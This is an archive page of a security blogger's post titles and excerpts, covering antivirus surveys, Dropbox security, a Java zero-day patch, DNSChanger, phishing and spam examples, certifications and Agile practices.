are heading back to school, it’s important for parents to understand the online safety and privacy issues that might arise during this busy time of year. A new school year brings new friends and new assignments. Both of these are likely to make kids spend more time online, whether they are communicating - [Avira Techblog: Dropbox’s two factor authentication and what happens when it fails](https://www.sorinmustaca.com/avira-techblog-dropboxs-two-factor-authentication-and-what-happens-when-it-fails/) - Some time ago, Dropbox offered two-factor authentication. This means, that you need to prove that you are in possession of something that only the owner of the account has. This is usually a mobile phone, but it can be also an application which generates a unique code. This type of authentication adds another layer of security on - [How to prevent SSL sniffing through fake certificate injection attack?](https://www.sorinmustaca.com/how-to-prevent-ssl-sniffing-through-fake-certificate-injection-attack/) - SSL stands for Secure Socket Layer and is an encryption protocol used to secure the communication on a network. SSL is used to encrypt the segment of network connections and it uses several methods to encrypt the data, depending on the goal which needs to be achieved: asymmetric cryptography for key exchange, symmetric encryption for - [Will the threat of viruses, malwares get more serious in the upcoming years?](https://www.sorinmustaca.com/will-the-threat-of-viruses-malwares-get-more-serious-in-the-upcoming-years/) - We have seen two years ago the first serious attempt to attack a nuclear power plant with a malware (Stuxnet) and the entire security industry as well as governments have started to take the entire issue very seriously. Basic utilities like electricity, water supply, gas for our cars and even food supplies depend on the - [Avira Techblog: Security 101: August 2012](https://www.sorinmustaca.com/avira-techblog-security-101-august-2012-3/) - As previously announced, we continue to answer questions received from the readers of the PC.COM magazine. Do I need to uninstall other internet security products before installing a new one? And why? Yes, it is mandatory to uninstall any security product before installing another one. There are many reasons for this, but the most important are: • The real time scanners will - [Avira Techblog: Security 101: August 2012](https://www.sorinmustaca.com/avira-techblog-security-101-august-2012-2/) - As previously announced, we continue to answer questions received from the readers of the PC.COM magazine. Do I need to uninstall other internet security products before installing a new one? And why? Yes, it is mandatory to uninstall any security product before installing another one. There are many reasons for this, but the most important are: • The real time scanners will - [Avira Techblog: Security 101: August 2012](https://www.sorinmustaca.com/avira-techblog-security-101-august-2012/) - As previously announced, we continue to answer questions received from the readers of the PC.COM magazine. Do I need to uninstall other internet security products before installing a new one? And why? Yes, it is mandatory to uninstall any security product before installing another one. There are many reasons for this, but the most important are: • The real time scanners will - [Avira Techblog: Oracle has released the patch for the Java 0-day exploit](https://www.sorinmustaca.com/avira-techblog-oracle-has-released-the-patch-for-the-java-0-day-exploit/) - We wrote about the Java 0-day exploit (CVE-2012-4681) and that there is no fix available from Oracle. In the meanwhile, we have added also detection for the exploit starting with t he engine version 8.2.10.148 or higher. All Avira products detect this exploit as EXP/CVE-2012-4681. Finally, Oracle released now the Patch 7 for the JRE version 1.7. - [Avira Techblog: 0-day exploit for Java 1.7](https://www.sorinmustaca.com/avira-techblog-0-day-exploit-for-java-1-7/) - Recently a vulnerability in Oracle’s Java Runtime Environment (JRE) 1.7 was discovered that may allow an applet to execute any program with arbitrary permissions. The JRE framework allows any browser on any supported platform to execute Java applications called applets in the browser. Tha JRE has its own security mechanisms, called Security Manager in Java. - [Avira Techblog: Speed ticket from NY Police via email](https://www.sorinmustaca.com/avira-techblog-speed-ticket-from-ny-police-via-email/) - No, it is actually a pretty interesting spam email which I received. The emails pretend to come from New York State ”Department of Motor Vehicles” and informs the recipient that he/she violated the speed limit . In order to see more details, a form hosted on a website should be accessed. The interesting part in this - [Avira Techblog: Microsoft patch day brings many security fixes](https://www.sorinmustaca.com/avira-techblog-microsoft-patch-day-brings-many-security-fixes/) - Microsoft did a good job in August by releasing to customers no less than 9 security bulletins which fix 5 critical security vulnerabilities and 4 important ones. Pretty much everything is affected : - the Windows operating system (XP 32bit SP3, XP 64 bit SP2, Windows Server 2003 and 2008, 2008 R2, Vista, Windows 7), - [Avira Techblog: Would you buy security software advertised in a spam?](https://www.sorinmustaca.com/avira-techblog-would-you-buy-security-software-advertised-in-a-spam/) - We received a spam email which advertises protection against Internet threats. The email comes from “Top Anti Virus Software” , an email address from a domain in India. There are only two links in the email, both pointing to the same URL from India which was used in the From field. At that address, of course, is - [Quoted in Washington Time: smartphone security](https://www.sorinmustaca.com/quoted-in-washington-time-smartphone-security/) - The article ran today from Shaun Waterman of The Washington Times re: smartphone security: http://times247.com/times-news/tech-firm-makes-smart-phones-safer Fraud follows the money Researchers in Europe have identified malware that surreptitiously forces smartphones to make calls or send text messages to premium rate lines, racking up income for the crooks who own the numbers and huge bills - [Finally, officially CSSLP certified](https://www.sorinmustaca.com/finally-officially-csslp-certified/) - (ISC)2 requires that a candidate meets some requirements before he/she receives the right to call himself/herself (ISC)2 certified. Receiving the (ISC)² credential is a several-step process: Required Experience – possessing the required number of years for the appropriate credential Study – taking advantage of the educational materials (ISC)² makes available for you to review and - [Never forget that as soon as any information is published on a public website, it doesn't actually belong to you anymore](https://www.sorinmustaca.com/never-forget-that-as-soon-as-any-information-is-published-on-a-public-website-it-doesnt-actually-belong-to-you-anymore/) - Avira Survey Finds Computer Users Don’t Feel Safe on Social Media Sites “This survey was very interesting because it demonstrated that even though social media sites are very popular among the general population, computer users from all over the world have the same concerns,” said Sorin Mustaca, data security expert at Avira.“They are wary of - [Expert Offers Tips on How to Clean Up a Computer - Softpedia.com](https://www.sorinmustaca.com/expert-offers-tips-on-how-to-clean-up-a-computer-softpedia-com/) - Softepedia republished my article in the TechBlog about "Spring cleaning your computer" into a new article. This is the original: Spring cleaning your computer This is the new article: Expert Offers Tips on How to Clean Up a Computer - [How to exhaust the space on any online backup system](https://www.sorinmustaca.com/how-to-exhaust-the-space-on-any-online-backup-system/) - Check the other article I wrote about Dropbox. While playing with the mklink, I made a mistake of trying something new: mklink /D S t:S Remember that the Dropbox folder was located in T:S. So, basically I created a circular reference... and this is what happened: This is what was transferred until when I - [Dropbox: How to backup other folders than the default Dropbox](https://www.sorinmustaca.com/dropbox-how-to-backup-other-folders-than-the-default-dropbox/) - I recently tested a couple of online backup solutions and one of them was Dropbox. If you know the system, you know also that Dropbox requires the user to choose a folder which will be synchronized in the cloud. That folder is called "Dropbox" and can't be changed. I wanted to backup a couple of - [Certified Secure Software Lifecycle Professional exam passed](https://www.sorinmustaca.com/certified-secure-software-lifecycle-professional-exam-passed/) - So, it is over ... I finally managed to be able to take the exam and I passed it. Let's see how I did it: Study materials Official (Isc)2 Guide to the Csslp (Isc2 Press) von Mano Paul (about 500 useful pages) The CSSLP Prep Guide: Mastering the Certified Secure Software Lifecycle Professional von Ronald L. Krutz und - [Quoted in the Networkworld.com because of the DNSChanger malware](https://www.sorinmustaca.com/quoted-in-the-networkworld-com-because-of-the-dnschanger-malware/) - http://www.networkworld.com/news/2012/012412-authorities-prepare-to-close-down-255242.html?hpg1=bn "If your computer was infected at some point in time and it was using one of the DNS servers which are now controlled by FBI, after March 8, it will no longer be able to make any DNS requests through these servers," Avira product manager and data security expert Sorin Mustaca said in - [How to check if your DNS Server was hacked](https://www.sorinmustaca.com/how-to-check-if-your-dns-server-was-hacked/) - Post initially published in Avira Techblog. You must have heard already about the already “famous” malware DNSChanger which manipulates the DNS settings of the computer in order to silently direct the users to malicious websites. FBI and others took action against this malware and in November 2011 have managed to break the botnet. According to FBI, - [RSYNC Daemon on Fujitsu Siemens SBLAN2 (NextFW version)](https://www.sorinmustaca.com/rsync-daemon-on-fujitsu-siemens-sblan2-nextfw-version/) - If you own such a device, then the first thing you do with it is to upgrade its firmware to NextFW. The Support forum of Fujitsu-Siemens is full of useful How-Tos which help you reach your goal. After you've done that, you may want to enable the rsync daemon . With a running rsync service - [9 Things That Motivate Employees More Than Money (guest post)](https://www.sorinmustaca.com/9-things-that-motivate-employees-more-than-money-guest-post/) - Original post: http://www.inc.com/ilya-pozin/9-things-that-motivate-employees-more-than-money.html Author: Ilya Pozin Be generous with praise. Everyone wants it and it’s one of the easiest things to give. Plus, praise from the CEO goes a lot farther than you might think. Praise every improvement that you see your team members make. Once you’re comfortable delivering praise one-on-one to an employee, try - [How LinkedIn uses your face for job ads](https://www.sorinmustaca.com/how-linkedin-uses-your-face-for-job-ads/) - I saw this picture while being logged in on LinkedIn. I wasn't doing anything specific and definitely not something related to job search. This appeared on the right side of the window. The funny thing is that if you click on Apply Now you see that actually the ad is location dependent. This job was in - [Google on security](https://www.sorinmustaca.com/google-on-security/) - So easy... http://www.google.com/security/ Passwords Gmail settings Security tools Malware Phishing Secure sites Safe networks Mobile security Family safety Shopping safety - [Improve your security](https://www.sorinmustaca.com/improve-your-security/) - Here are some articles I wrote in the Avira Techblog about how to improve your security: Improve your security #5: use dedicated accounts for each user Improve your Security #4: Update your Software often Improve your Security #3: Online Protection Improve your Security #2: Securing your notebook Improve your Security #1: Complex passwords aren’t always - [My photos in the Boulevard Magazine](https://www.sorinmustaca.com/my-photos-in-the-boulevard-magazine/) - Boulevard Magazine has published my photos about Bodensee in their latest edition. The article starts at page 43 and is 7 pages long (incl. pictures). Here are the screenshots: - [Virus Bulletin International Conference 2011](https://www.sorinmustaca.com/virus-bulletin-international-conference-2011/) - The VB2011 - the 21st Virus Bulletin International Conference took place between 5-7 October 2011 in Barcelona, Spain. The city of Barcelona is a wonderful place to be. Pity that I didn't have enough time to see all of its wonders. Here is the article about the Opening of the conference. Here are the reports from - [Some tips for Shopping Online safe](https://www.sorinmustaca.com/some-tips-for-shopping-online-safe/) - The source is an article I wrote for the Avira press release : http://www.avira.com/en/press-details/nid/528/news/consumers-concerns-online-shopping-safety Here are the tips: I recommend that consumers watch for a few things in order to not become a victim of the online fraudsters: Always check that the connection to the online store where the payment is done is secured. - [About cyberterrorism](https://www.sorinmustaca.com/about-cyberterrorism/) - How do you define cyberterrorism? The definition of cyberterrorism is since the 90s highly debated because it is not easy to define how devastating the damages of a computer attack are. However, according to many sources in the Internet, it appears that the definition of to the U.S. Federal Bureau of Investigation is the one - [The Freemium model](https://www.sorinmustaca.com/the-freemium-model/) - I stumbled on a very good article on TechCrunch written by the contributor UZI SHMILOVICI from the company Future Simple. The article is called "The Complete Guide To Freemium Business Models" and it is located here. - [ Google Plus and usability (part 2): no way to hide people](https://www.sorinmustaca.com/google-plus-and-usability-part-2-no-way-to-hide-people/) - This is the second post in the series Google Plus and usability. Here is the first post: Part 1 In Facebook, there is a way to hide the post from certain people to reach your News Feed, without stopping being friend with them. How can you hide the posts from someone in G+? You can exclude - [Google Page Speed Service](https://www.sorinmustaca.com/google-page-speed-service/) - Page Speed Service is an online service to automatically speed up loading of your web pages. Page Speed Service fetches content from your servers, rewrites your pages by applying web performance best practices and serves them to end users via Google's servers across the globe. The extent of speed up depends on a variety of - [Follow me ...](https://www.sorinmustaca.com/follow-me/) - I added a new widget on the right side of the blog which allows someone to follow my posts. - [Picasa gets unlimited online storage because of Google Plus](https://www.sorinmustaca.com/picasa-gets-unlimited-online-storage-because-of-google-plus/) - Bug or feature ? Feature, of course, since it is coming from Google. Since G+, Picasa is receiving unlimited online storage. When I created my G+ account, I was asked if i want to merge my Picasa Web Account with G+. I said yes, and since then, the counter of the pictures doesn't work - [How to make a mediacenter PC and record video from TV](https://www.sorinmustaca.com/how-to-make-a-mediacenter-and-record-video-from-tv/) - It all started when a friend told me that he is building a router with a all-in-one motherboard with an Atom processor inside. I always wanted to build a computer in order to solve these problems: to be there for the entire family at any time, even if I am not at home my and - [Google Plus and usability (part 1): can't write a message to a single person](https://www.sorinmustaca.com/google-plus-and-usability-part-1/) - So, I finally got an invitation to use the Google Plus. I will not comment about this service because a lot has been written, but I will comment on its usability. Here are the most nerving issues which the Product Managers from Google seem to have not understood: I want to write to a friend - [About Cloud Computing in Darkreading.com](https://www.sorinmustaca.com/about-cloud-computing-in-darkreading-com/) - When Consumers Go To The Cloud, Businesses Should Watch Out Companies should take a look at what cloud services their employees are using following last week's authentication bug at Dropbox Dropbox encrypts data on the servers, but not to individual accounts, notes Sorin Mustaca, a product manager with security firm Avira. Anyone with admin access - [Free E-Books on C and C++](https://www.sorinmustaca.com/free-e-books-on-c-and-c/) - This article is published here on ReadWriteWeb. 1. Introduction to C Programming by Rob Miles 2. The C Book by Mike Banahan, Declan Brady and Mark Doran 3. How to Think Like a Computer Scientist C++ Version by Allen B Downey 4. Thinking in C++ 2nd edition Vol. 1 and 2 by Bruce Eckel Volume - [Good idea bad implemented: notify.me](https://www.sorinmustaca.com/good-idea-bad-implemented-notify-me/) - From "about us" on the website: notify.me delivers notifications that interest you in near real time. It eliminates the need for you to constantly check on classified listings, blogs or social networking sites. Notifications are pushed to your destinations of choice such as instant messenger, mobile phone, email, desktop or web application. Check out our - [Quoted in TechNewsWorld about the challenges of the cloud adoption ](https://www.sorinmustaca.com/837/) - Who Watches the Watchmen, Part 3: Flying Headlong Into a Cloud By Richard Adhikari, TechNewsWorld "Once you're in the cloud, information doesn't belong only to you but also to the provider of the cloud service," Sorin Mustaca, a data security expert at Avira, told TechNewsWorld. The risks involved in moving to the cloud include - [Skype distributing software(games) without user's explicit approval ?](https://www.sorinmustaca.com/skype-distributing-softwaregames-without-users-explicit-approval/) - Since yesterday evening, the users of Skype for Windows who installed the EXTRAS features, have started to receive software automatically. The software comes from EasyBits Media, a company from Oslo, Norway. The Skype users have started to complain yesterday afternoon and the drama seems to continue, without Skype officials to comment on this. The entire thread - [Enabled comments in the blog](https://www.sorinmustaca.com/enabled-comments-in-the-blog/) - Starting as of today, I enabled the comments on my blog sorin-mustaca.com . It is an experiment to see if someone really posts and to see also how much spam do I get. - [Email Spam Not the Problem it Once Was for the End-users](https://www.sorinmustaca.com/email-spam-not-the-problem-it-once-was-for-the-end-users/) - IT security expert Avira found during recent surveys of its customers that email spam is still an everyday occurrence, but not the nuisance it once was. Nearly half of all end-users are satisfied with the anti-spam filters on their PCs and laptops, plus many others rely upon their Internet Service Provider (ISPs) to filter messages. - [Quoted in esecurityplanet.com : Top 10 ID Security Mistakes and How to Avoid Them](https://www.sorinmustaca.com/quoted-in-esecurityplanet-com-top-10-id-security-mistakes-and-how-to-avoid-them/) - http://www.esecurityplanet.com/features/article.php/3934376/Top-10-ID-Security-Mistakes-and-How-to-Avoid-Them.htm "Make sure that when writing or accessing sensitive information there is no one watching over your shoulder," advises Sorin Mustaca, data security expert with Avira. "This applies also to surveillance cameras installed in many public places." - [Vote for my pictures](https://www.sorinmustaca.com/vote-for-my-pictures/) - Click on this link: http://www.breitling.com/contest/vote.php?u=658025144 Login on Facebook and vote my pictures either one by one or all at once: http://apps.facebook.com/breitling/votepic.php?id=3648 http://apps.facebook.com/breitling/votepic.php?id=3647 http://apps.facebook.com/breitling/votepic.php?id=3646 http://apps.facebook.com/breitling/votepic.php?id=3645 If I get enough votes I might get a voucher to get a flight license. This is how you vote: 1. Go here: http://www.breitling.com/contest/vote.php?u=658025144 2. You are asked to login to - [Question: would you buy an Antivirus product?](https://www.sorinmustaca.com/question-would-you-buy-an-antivirus-product/) - [Question: Do you make backups ?](https://www.sorinmustaca.com/question-do-you-make-backups/) - Do you make backups ? Please answer on Facebook : http://on.fb.me/l8NCmy - [Question: Do you configure your antivirus product ? ](https://www.sorinmustaca.com/question-do-you-configure-your-antivirus-product/) - Please answer here on Facebook : http://on.fb.me/lBFoFD - [Microsoft Defender and dangerous alert levels](https://www.sorinmustaca.com/microsoft-defender-and-dangerous-alert-levels/) - Description: This program changes various computer settings. Advice: This software is typically benign when it runs on your computer, unless it was installed without your knowledge. If you're not sure whether to permit it, review the alert details or check if you recognize and trust the publisher of the software. Category: Tool - [Lazy Developers Hate Agile and Scrum (updated with my opinion)](https://www.sorinmustaca.com/lazy-developers-hate-agile-and-scrum/) - From Agilescout.com “Lazy developers cannot hide specific problems for weeks. Every day you have to explain your progress.” “Lazy developers hate Scrum because they have to report progress everyday.” “It’s really a team effort, the team has the responsibility to deliver together.” “Lazy developer are often the ones that now have to show what they’ve - [Next C++ generation: C++11](https://www.sorinmustaca.com/next-c-generation-c11/) - Introducing C++11: Next iteration of programming language passes review (PhysOrg.com) -- This past week in Madrid, Spain, the next iteration of the C++ programming language, C++11, passed review by the technical standards committee. "The new standard provides language features that make it easier to write correct and well-performing code in C++ together with more standard - [Quoted in the article : "Browser War: What Is It Good For?" in technewsworld.com](https://www.sorinmustaca.com/quoted-in-the-article-browser-war-what-is-it-good-for-in-technewsworld-com/) - Source: Browser War: What Is It Good For? "All vendors are trying to implement the latest trends in the industry in order to remain competitive and face the challenges of the online world, and to react to vulnerabilities," Sorin Mustaca, a data security expert at Avira, told TechNewsWorld. "For example, two years ago, nobody thought - [Everybody should feel free to communicate with others](https://www.sorinmustaca.com/everybody-should-feel-free-to-communicate-with-others/) - Everybody should feel free to communicate with others What can be more normal than that? But, many times, when we want to add more structure, more processes and order into an operation, exactly this order creates communication channels (read: rules) in such a way that prevents people to communicate with the others. This is a - [Paypal and Phishing : Paypal CISO's Dream vs. Reality](https://www.sorinmustaca.com/paypal-and-phishing-paypal-cisos-dream-vs-reality/) - I received from the CompTIA Smartbrief newsletter a notification about an interesting article: PayPal security guru: No one is safe from threats This is the article PayPal security chief on Epsilon breach and more written by Elinor Mills of Cnet. I agree with most of the comments of Mr. Barret until this one: Q: Is - [Dilbert on Agile](https://www.sorinmustaca.com/dilbert-on-agile/) - One picture is worth a thousand words :-) - [Amazon Cloud Drive released - 5 GB free online storage](https://www.sorinmustaca.com/amazon-cloud-drive-released-5-gb-free-online-storage/) - Amazon Cloud Drive is like a hard drive in the cloud available only through the web browser. You can store your music, videos, photos, and documents on Amazon's secure servers. It also accepts malware :-) Uploading the eicar.com test file produced no warning. Pity... More details and a free account can be obtained here: https://www.amazon.com/clouddrive/ - [New design for my personal website](https://www.sorinmustaca.com/new-design-for-my-personal-website/) - I finally found some time to change the website from the old design in dark colors to a Wordpress (statical) blog. The new design is simpler and it is only on one single level. I got rid of all the old things and left only what is relevant. Here is the structure with links: Home - [All browsers are (not) equal](https://www.sorinmustaca.com/all-browsers-are-not-equal/) - I recently installed IE9 because it is the latest which Microsoft produced. I was curious how my website looks like so I told myself that wouldn't be a bad idea to compare this website in various browsers. I took Google's Chrome, Mozilla Firefox and IE9, the latest version at the moment of writing this post. - [5 Apple security myths](https://www.sorinmustaca.com/5-apple-security-myths/) - Five Apple Security Myths — and the Disturbing Truths Five hard lessons With that in mind, here are five Apple security myths — and the brutal truth behind each: Myth: I don't need antivirus and spam protection because I work on a Mac. Truth: The Mac OS X operating system is targeted less frequently by - [Porting applications on 64 bits cross platform](https://www.sorinmustaca.com/porting-applications-on-64-bits-cross-platform/) - Porting Linux* Applications to 64-bit Intel® Architecture Porting MacOSX Applications to 64-bit Intel® Architecture Porting Windows applications (32-bit) to 64-bit Intel® Architecture - [Scrum in a presentation](https://www.sorinmustaca.com/scrum-in-a-presentation/) - Yes, you got it until now... I am learning more and more Scrum and I find more and more resources on the net. The more I read, the more I like the concepts. Here is a presentation about Scrum which is freely available and redistributable. I am definitely going to use it. English version Formats: Powerpoint - [The Twelve Principles of Agile Software](https://www.sorinmustaca.com/the-twelve-principles-of-agile-software/) - The Twelve Principles of Agile Software of the Agile Alliance: Our highest priority is to satisfy the customer through early and continuous delivery of valuable software. Welcome changing requirements, even late in development. Agile processes harness change for the customer's competitive advantage. Deliver working software frequently, from a couple of weeks to a couple of - [Scrum on a page](https://www.sorinmustaca.com/scrum-on-a-page/) - The direct link to the document is here: Scrum on 1 page The source of the document is here: http://scrum-master.de/Downloads/Scrum_on_a_Page (German) - [Avira DE-Cleaner](https://www.sorinmustaca.com/avira-de-cleaner/) - Have you seen this page : https://www.botfrei.de/decleaner.html#avira Avira has released the long awaited DE-Cleaner, which is a standalone tool intended to scan a PC without installing any drivers and registry keys. But, if the Avira DE-Cleaner detects that an Avira Premium or Personal Product is installed, it will use its drivers ;) Cool... - [OpenVPN on Vista 7 64 bit which really works](https://www.sorinmustaca.com/openvpn-on-vista-7-64-bit-which-really-works/) - I use OpenVPN to be able to connect to the company's network when I am away. If you ever worked with this tool, you know that it is not so easy to install it on a 64 bit Windows and it is even harder to do this on Windows 7. So, it seems normal that - [Improve your Security #3: Online Protection](https://www.sorinmustaca.com/improve-your-security-3-online-protection/) - It is usually said that those who are behind a hardware router are protected from any danger. This is true in regard to the connections that come from outside but it is not true for the dangers which come from inside the local network. We must not forget that most of threats are landing on - [Improve your Security #2: Securing your notebook](https://www.sorinmustaca.com/improve-your-security-2-securing-your-notebook/) - Quite a lot of people take now their netbook or smartphone with them when travelling. Because of this, almost every quarter of the year we read stories about sensitive personal data was lost because some laptop or USB stick got stolen. Moreover, with the rise of the mobile devices like smartphones, tablets and pads, anyone - [Improve your Security #1: Complex passwords aren’t always better](https://www.sorinmustaca.com/improve-your-security-1-complex-passwords-arent-always-better/) - I have published the first article in this series in the Avira Techblog here :http://techblog.avira.com/2011/01/31/improve-your-security-1-complex-passwords-arent-always-better And, as a confirmation of what I wrote, I found this article on CIO Magazine: Apple and Google will kill password If I could only offer them a hand :) Actually, I could do something in this direction by creating - [Let there be only one !](https://www.sorinmustaca.com/let-there-be-only-one/) - One Package Manager for them All The idea of one universal package format for all distributions has been batted around a few times over the years. Developers from RedHat, Fedora, Debian, Ubuntu, openSUSE, Mandriva and Mageia got together last week at the SUSE office in Nürnberg to discuss how they might implement a universal application - [Complex passwords aren't always better](https://www.sorinmustaca.com/complex-passwords-arent-always-better/) - Recently I've had the exam for the CompTIA Security+ Certification. While practicing for the exam, I've had the following question. Q:When setting password rules, which of the following will lower the level of security of a network ? A: Complex passwords that users can not remotely changed are randomly generated by the administrator and given - [Smart and true quote](https://www.sorinmustaca.com/smart-and-true-quote/) - If there's anything I've learned from my years in the tech world, it's that companies don't get killed by competition. They usually find creative ways to commit suicide. Sridhar Vembu,CEO of Zoho How true this is ! This applies to me as well. Now, let me detail this a little bit. If a company wants - [The CompTIA Security+ Certification: passed](https://www.sorinmustaca.com/the-comptia-security-certification-passed/) - I've had today the exam for the CompTIA Security+ SYS-201 certification and passed it with 828 points out of 900 (min. 750 to pass it). I've learnt after the book The CompTIA Security+ 2008 Study Guide, 4th Edition., author Emmet Dulaney. Why this book ? It was recommended by CompTIA on their website and it - [Anti-Virus Users Are Restless, Avira Survey Finds (Update)](https://www.sorinmustaca.com/anti-virus-users-are-restless-avira-survey-finds/) - [A closer analysis of DE-Cleaner from Symantec](https://www.sorinmustaca.com/a-closer-analysis-of-de-cleaner-from-symantec/) - I was curious about how the DE-Cleaner of Symantec works, so I downloaded the software and give it a closer look. I did not dissemble it or anything similar... I simply performed a little black box testing. So, I started it without any internet connection. The result was: no scanning was possible. DE-Cleaner requires an - [Tweet in an infinite loop (Update)](https://www.sorinmustaca.com/tweet-in-an-infinite-loop/) - My account was hit by what appears to be a loop in the Twitter system. I am not sure yet of what has happened, but I am working on it. Apparently, Google Feedburner or Google Adsense is taking my RSS feed from Twitter and is republishing everything on Twitter. This is the effect sorinmustaca Sorin - ["Not all AV software are the same" - CompTIA Security+ 2008](https://www.sorinmustaca.com/not-all-av-software-are-the-same-comptia-security-2008/) - CompTIA Security+ 2008, page 99, Chapter Antivirus Not all AV software is the same. Free AV software that is available for download through the Internet will typically only look for viruses in standard files. However, most commercial AV software will also look for Trojans, worms, macro viruses, and adware in standard files as well as - [Romanian Phishing: Ministertul Finantelor Publice - Taxe si Impozite](https://www.sorinmustaca.com/romanian-phishing-ministertul-finantelor-publice-taxe-si-impozite/) - "Romanian tax return phishing" published in the Avira Techblog From: Ministerul Finantelor Publice Date: 25.11.2010 07:54:34 Subject: Ministertul Finantelor Publice - Taxe si Impozite Dupa ultimele calcule ale activitatii dumneavoastra anuale am stabilit ca va sunt eligibile pentru primirea unei rambursari a impozitului in conformitate cu sectiunea 501 (c). Valoarea impozitului returnat este de 473,27 - ["Cybercriminals from Eastern Europe"](https://www.sorinmustaca.com/cybercriminals-from-eastern-europe/) - "Cybercriminals from Eastern Europe" - quote from CompTIA Security+ 2008, Chapter 1, Page 36 Oh, please... this is stupid ! It is true that many of the attacks are conducted from Eastern Europe, but this is not the way to publish something like this. You are ruining their chances. There are many good guys and - [Sidejacking and Wi-Fi security](https://www.sorinmustaca.com/sidejacking-and-wi-fi-security/) - Avira – TechBlog : Sidejacking and Wi-Fi security All started with this article written by Byron Acohido from USA Today: http://lastwatchdog.com/firesheep-wi-fi-eavesdropper-works-mcdonalds-starbucks/ Then I wrote the article in the Techblog based on the feedback I provided to Byron. - [Virus Bulletin Article on Anti-Botnet-Initiative](https://www.sorinmustaca.com/virus-bulletin-article-on-anti-botnet-initiative/) - Virus Bulletin Article on Anti-Botnet-Initiative The Virus Bulletin Magazine has published an article on the anti-botnet initiative in which Avira takes part. The goal is to clean infected computers and reduce the impact of cyber criminal activities. Read the article here (.pdf, 111kb) or head over to the Virus Bulletin web site where the magazine - [Avira Survey Shows 50 Percent of People Are Concerned About Banking Online](https://www.sorinmustaca.com/avira-survey-shows-50-percent-of-people-are-concerned-about-banking-online/) - See the original article here and an interview with me for the Infosecurity US Magazine. I gave the interview on telephone calling the editor from home at 21.00h :) Additional news here: http://www.esecurityplanet.com/trends/article.php/3912941/Online-Banking-Security-a-Concern-for-Most-Survey.htm In German: http://www.securitymanager.de/magazin/news_h42825_avira_fast_die_haelfte_der_anwender_ist_besorgt.html That's fun ;) - [Sandboxing the Adobe Reader](https://www.sorinmustaca.com/sandboxing-the-adobe-reader/) - Will this change really make Adobe Reader more reliable ? In order to be more reliable, they have to make everything more reliable. And Adobe doesn't know how to do this. Here is the saga: Introduction: http://blogs.adobe.com/asset/2010/07/introducing-adobe-reader-protected-mode.html Part 1: http://blogs.adobe.com/asset/2010/10/inside-adobe-reader-protected-mode-part-1-design.html Part 2: http://blogs.adobe.com/asset/2010/10/inside-adobe-reader-protected-mode-%e2%80%93-part-2-%e2%80%93-the-sandbox-process.html Update: We published an article in the Techblog about this : http://techblog.avira.com/2010/11/05/the-adobe-reader-sandbox/en/ - [New entry in the TSC: Script in the middle](https://www.sorinmustaca.com/new-entry-in-the-tsc-script-in-the-middle/) - Thanks to Virus Bulletin, we have now a new entry in The Spammers' Compendium: Script in the middle UO!Script in the Middle!JavaScript 14 October 2010 Description The email has an HTML document attached to it that contanis a for. Clicking submit will POST the user's data to a website controlled by the crooks, which automatically - [Guest blogger: Larry.Walsh: Security Idea: Recall the Internet](https://www.sorinmustaca.com/guest-blogger-larry-walsh-security-idea-recall-the-internet/) - I totally agree with this blog post of Larry.Walsh (seen on from CompTIA). Source: http://blog.comptia.org/2010/10/13/security-idea-recall-the-internet/ Author: Larry.Walsh Microsoft’s Scott Charney says we should treat malware-infected PCs in the same manner as 19th century public health officials treated victims of typhoid, tuberculosis and cholera: quarantine. Yes, the head of Microsoft’s Trustworthy Computing believes malware infections are - [QR Code of this website](https://www.sorinmustaca.com/qr-code-of-this-website/) - QR Code of this website from bit.ly: (Taken from bit.ly and adding .qr at the end of the shortened URL) Taken from goo.gl: More about the QR codes can be found on Wikipedia: http://en.wikipedia.org/wiki/QR_Code A QR Code is a matrix barcode (or two-dimensional code), readable by QR scanners, mobile phones with a camera, and smartphones. - [Nigerian scams are modernizing](https://www.sorinmustaca.com/nigerian-scams-are-modernizing/) - I sometimes laugh of these scammers, but sometimes I am quit amazed of their capability to adapt to the spam filters. My Google account caught this spam: In text, this is : Good Day, I am Mr. Ming Yang,Director of operations of the Hang Seng Bank Ltd,Sai Wan Ho Branch,Hong Kong.I am here-by seeking your - [URLAggregator.net: The archive of the Security News Feed is online](https://www.sorinmustaca.com/urlaggregator-net-the-archive-of-the-security-news-feed-is-online/) - I registered http://www.URLAggregator.net in order to have an overview of the RSS Feeds which I am using. You can see there exactly the messages I am publishing on Twitter, without going to Twitter. This will change in the future to something else ;) - [The presentation from the eco Antispam Summit](https://www.sorinmustaca.com/the-presentation-from-the-eco-antispam-summit/) - Presentation at the Anti-Botnet Initiative Presentation at the Anti-Botnet InitiativeView more presentations from msorin. - [onMouseOver() Twitter security flaw (+Update)](https://www.sorinmustaca.com/onmouseover-twitter-security-flaw/) - A Twitter security flaw is being widely exploited on Twitter, showing remote content from third-party websites without user's consent. The flaw uses a JavaScript function called onMouseOver() which creates an event when the mouse is passed over a text or link. Any user can use this flaw to create simple popups, redirect the page to - [Interview with me in Signal Magazine : "Web Surfers Suspicious"](https://www.sorinmustaca.com/interview-with-me-in-signal-magazine-web-surfers-suspicious/) - This is an interview I gave on telephone for Signal Magazine. "... Internet can be a dangerous activity, but the security status of different types of websites is not the same, Sorin Mustaca, data security expert, says. ... " I am a little bit unhappy about this, which I never said: "Mustaca admits that the - [Softpedia about the Anti-Botnet initiative of eco and BSI](https://www.sorinmustaca.com/softpedia-about-the-anti-botnet-initiative-of-eco-and-bsi/) - The Avira Techblog published today a new article of mine about the Anti-Botnet Initiative. Immediately after, Softpedia commented on the Anti-Botnet Initiative : "While running the Linux from the rescue system, Windows is completely inactive (not as in Safe mode) so the rootkits are also not active. This is actually the only reliable possibility to - [You are being (RFID) tagged](https://www.sorinmustaca.com/you-are-being-rfid-tagged/) - A new article inspired by a personal experience was published in the Avira Techblog: http://techblog.avira.com/2010/09/07/you-are-being-tagged/en/ . Be aware of these RFIDs... they can be very easily misused. - [Sometimes it is good to know the Romanian language](https://www.sorinmustaca.com/sometimes-it-is-good-to-know-the-romanian-language/) - Just stumbled upon this blog post from Symantec http://www.symantec.com/connect/blogs/spammers-introduce-new-email-internet-headers where an absolutely normal spam process is described. Unfortunately for the author who clearly doesn't understand Romania, he copied/pasted all headers, even those which he doesn't understand. So, he copied all kind of bad words, things which you usually wouldn't publish in a serious blog. I - [New Spammer's Compendium Entry:The Responsibility Transfer](https://www.sorinmustaca.com/new-spammers-compendium-entrythe-responsibility-transfer/) - Source: http://www.virusbtn.com/resources/spammerscompendium/responsibility.xml The Responsibility Transfer UO!Responsibility!JavaScript 31 August 2010 Description Using an attached HTML document that contains almost the same page as the HTML-part of the email body, but uses obfuscated JavaScript to redirect the user to a malicious website. Submitted by Sorin 